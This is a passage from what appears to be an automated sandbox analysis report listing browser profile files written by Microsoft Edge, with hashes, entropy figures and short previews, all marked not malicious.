                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):12288
                                                                                                                                                                  Entropy (8bit):0.3202460253800455
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:l9bNFlEuWk8TRH9MRumWEyE4gLueXdNOmWxFxCxmWxYgCxmW5y/mWz4ynLAtD/W4:TLiuWkMORuHEyESeXdwDQ3SOAtD/ie
                                                                                                                                                                  MD5:40B18EC43DB334E7B3F6295C7626F28D
                                                                                                                                                                  SHA1:0E46584B0E0A9703C6B2EC1D246F41E63AF2296F
                                                                                                                                                                  SHA-256:85E961767239E90A361FB6AA0A3FD9DAA57CAAF9E30599BB70124F1954B751C8
                                                                                                                                                                  SHA-512:8BDACDC4A9559E4273AD01407D5D411035EECD927385A51172F401558444AD29B5AD2DC5562D1101244665EBE86BBDDE072E75ECA050B051482005EB6A52CDBD
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):0.46265176391955903
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBudLm:TouQq3qh7z3bY2LNW9WMcUvBudS
                                                                                                                                                                  MD5:96A3592C4DC85AD3C2BA1478D93D1829
                                                                                                                                                                  SHA1:47028859E89C2103D6A25539CB921AC181543378
                                                                                                                                                                  SHA-256:EE5ADD93813E9110CD451127577DA7C7745BFADF9156D99A8081E92EB51004ED
                                                                                                                                                                  SHA-512:57C753DD3435665ECFF4B2CC85B32B2A5C32FEDCB4ED233519DA1637E804F27589A95A1EA837F6D4A78BC88ED07FB5DED350FC029C93B965A703C47C0DB81C08
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                  Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                  MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                  SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                  SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                  SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                  Entropy (8bit):9.47693366977411E-4
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:LsNlstCrll:Ls3stCxl
                                                                                                                                                                  MD5:E3B2319D47340F0212B2BF7C99EE5358
                                                                                                                                                                  SHA1:5C3BE5F91AB664AADF8D20645860C2E24E774E34
                                                                                                                                                                  SHA-256:A4B0F683414779CE12096B12BAEC69803B1E533E9059007ADC82283442974957
                                                                                                                                                                  SHA-512:484BA51E300844AE3191FE696A8C0146DE6D99101C59CA97EB0EB00C9AD26C1869A0A22DEBE2A5B6FEECB0EEF3B32E37BB5416D432B8A349335F7108F66A63BC
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):33
                                                                                                                                                                  Entropy (8bit):3.5394429593752084
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                  MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                  SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                  SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                  SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:...m.................DB_VERSION.1
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):303
                                                                                                                                                                  Entropy (8bit):5.201184036488427
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iO/UERM1wkn23oH+TcwtnG2tbB2KLl91q2Pwkn23oH+TcwtnG2tMsIFUv:7/dRrfYebn9VFLz1vYfYebn9GFUv
                                                                                                                                                                  MD5:A2DA09340AA78D645D678DC01B00E938
                                                                                                                                                                  SHA1:840AE70493B06DDDDA7EFF3CB941FFCED949067C
                                                                                                                                                                  SHA-256:4754028814C1C84B497BF5CF9ECDFC05FCC635CB3FE5A832B88457C1C2F03C12
                                                                                                                                                                  SHA-512:A8B2320B8BA34A1E35928987A359C2CD4EF0230C0BC0938B733E7EFD0943C6BA4FB0EC7C6DFC0C6F99D02530401C3AB451D7AE24E4F714831C629AC6D639E3FA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:17:54.274 d04 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db since it was missing..2025/01/06-17:17:54.292 d04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 14, database pages 8, cookie 0xe, schema 4, UTF-8, version-valid-for 14
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                  Entropy (8bit):0.494709561094235
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:TLEC30OIcqIn2o0FUFlA2cs0US5S693Xlej2:ThLaJUnAg0UB6I
                                                                                                                                                                  MD5:CF7760533536E2AF66EA68BC3561B74D
                                                                                                                                                                  SHA1:E991DE2EA8F42AE7E0A96A3B3B8AF87A689C8CCD
                                                                                                                                                                  SHA-256:E1F183FAE5652BA52F5363A7E28BF62B53E7781314C9AB76B5708AF9918BE066
                                                                                                                                                                  SHA-512:38B15FE7503F6DFF9D39BC74AA0150A7FF038029F973BE9A37456CDE6807BCBDEAB06E624331C8DFDABE95A5973B0EE26A391DB2587E614A37ADD50046470162
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.613200498775134
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:TLqpR+DDNzWjJ0npnyXKUO8+jTW8pVW4emL:Te8D4jJ/6Up+XTFr
                                                                                                                                                                  MD5:9356EBF5FAB0013AA9A438559AC4016A
                                                                                                                                                                  SHA1:7FB611E5DF33A2801FE031E498E4F1C5A33A7957
                                                                                                                                                                  SHA-256:21170D4E1155D8702E977E5654A00DBAD3EEE6D102881CC1B2D626EF92088E7B
                                                                                                                                                                  SHA-512:58BA7CC35EF01E58817597BEE0BDCB948E51FD9333A0A9AFEACAD43A5470D98CB596B2C8E1F53B7FB06BCDACC4667B148A148020973ED421150794E5FA7C7BCE
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):375520
                                                                                                                                                                  Entropy (8bit):5.3541269104370235
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6144:kA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:kFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                  MD5:739705141E427B35568056CD835EBF00
                                                                                                                                                                  SHA1:FE54A8349CDC4FF01DF356B270D789200E8C703B
                                                                                                                                                                  SHA-256:470AD84049818F768292CF38C86F158A02584605AA68FB7AFB346FCDD56C7E17
                                                                                                                                                                  SHA-512:AF27DFDD7CAE91CE3EF22D7CFA95C008B1447BC95C9C3A181701193EC0B17BCADB6E1D85A729E0CE8ADB24A64DB8CE84A129AC7BA6BD39DFA75453D3523D2667
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):307
                                                                                                                                                                  Entropy (8bit):5.159342096833931
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iO/MD1wkn23oH+Tcwtk2WwnvB2KLl97KQ+q2Pwkn23oH+Tcwtk2WwnvIFUv:7/bfYebkxwnvFLz7KQ+vYfYebkxwnQF2
                                                                                                                                                                  MD5:0271DF5D31388836D4B90C119E23012C
                                                                                                                                                                  SHA1:82EB258093D9824B6FE19385DFE461908B7459C3
                                                                                                                                                                  SHA-256:A72F1EBC57F1F4AF7DD97B7DB0F80B75ECC4F323FE56EA5D86ABE986F7C0B0C4
                                                                                                                                                                  SHA-512:5CBEA10CE1D281EC1366ED84B8AF1394A08C23CDD69BE241AA0986A44768B8153197DAFFA03027DF225C25C12F5BDEEBB66E27A9B8888CD5DD462FE50784ED67
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:18:00.355 c0c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2025/01/06-17:18:00.543 c0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:modified
                                                                                                                                                                  Size (bytes):358860
                                                                                                                                                                  Entropy (8bit):5.32460667713101
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6R/:C1gAg1zfvX
                                                                                                                                                                  MD5:D0EF3092291F5EF852970E5A36501039
                                                                                                                                                                  SHA1:ED9A780AFDF561ED40964AF436D0C9F9233E92C5
                                                                                                                                                                  SHA-256:E98DCF37EB24F0AD7577E369ABEF92F6B524A209D98D5A564E12D097CF685578
                                                                                                                                                                  SHA-512:EDE20E034864DDC3F172E1AC31A208AA86518731B0018D0E9AC0A4A016DE1BAEE3D0B52990E08A420B41C811B6FF9ECBA11A4803A9349AA0B0F1012A2C60F0D3
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):209
                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCTCTCT
                                                                                                                                                                  MD5:478D49D9CCB25AC14589F834EA70FB9E
                                                                                                                                                                  SHA1:5D30E87D66E279F8815AFFE4C691AAF1D577A21E
                                                                                                                                                                  SHA-256:BB6CC6DF54CF476D95409032C79E065F4E10D512E73F7E16018E550456F753D5
                                                                                                                                                                  SHA-512:FB5431054A23D3C532568B1F150873D9130DBC4A88BE19BC2A4907D0DC2888C5B55993154EAD4A6C466E2173092B8705684A6802B850F051639E1F2457387471
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):281
                                                                                                                                                                  Entropy (8bit):5.173716751350752
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iO/5SM1wkn23oH+Tcwt8aVdg2KLl95lyq2Pwkn23oH+Tcwt8aPrqIFUv:7/5SrfYeb0Lz5IvYfYebL3FUv
                                                                                                                                                                  MD5:E2FF1C1CDC2B1D61A63D36E888849029
                                                                                                                                                                  SHA1:F9FE990728BA9AB23622D3E5D2B4CBFCC66B0191
                                                                                                                                                                  SHA-256:5725BC70811B385D820E8A1F734B476984616E2B34C36ACAACB088CCA9147119
                                                                                                                                                                  SHA-512:FD0D224282671383A277082F1497B47A8B449DF69F6450A22A8615D9706EE67B3E4FC47B406A5A0A8C81180C1F3267C8FA1BF5F3E344A92B64AD35C5AE895F25
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:17:54.272 1e94 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules since it was missing..2025/01/06-17:17:54.294 1e94 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):209
                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCTCTCT
                                                                                                                                                                  MD5:478D49D9CCB25AC14589F834EA70FB9E
                                                                                                                                                                  SHA1:5D30E87D66E279F8815AFFE4C691AAF1D577A21E
                                                                                                                                                                  SHA-256:BB6CC6DF54CF476D95409032C79E065F4E10D512E73F7E16018E550456F753D5
                                                                                                                                                                  SHA-512:FB5431054A23D3C532568B1F150873D9130DBC4A88BE19BC2A4907D0DC2888C5B55993154EAD4A6C466E2173092B8705684A6802B850F051639E1F2457387471
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):285
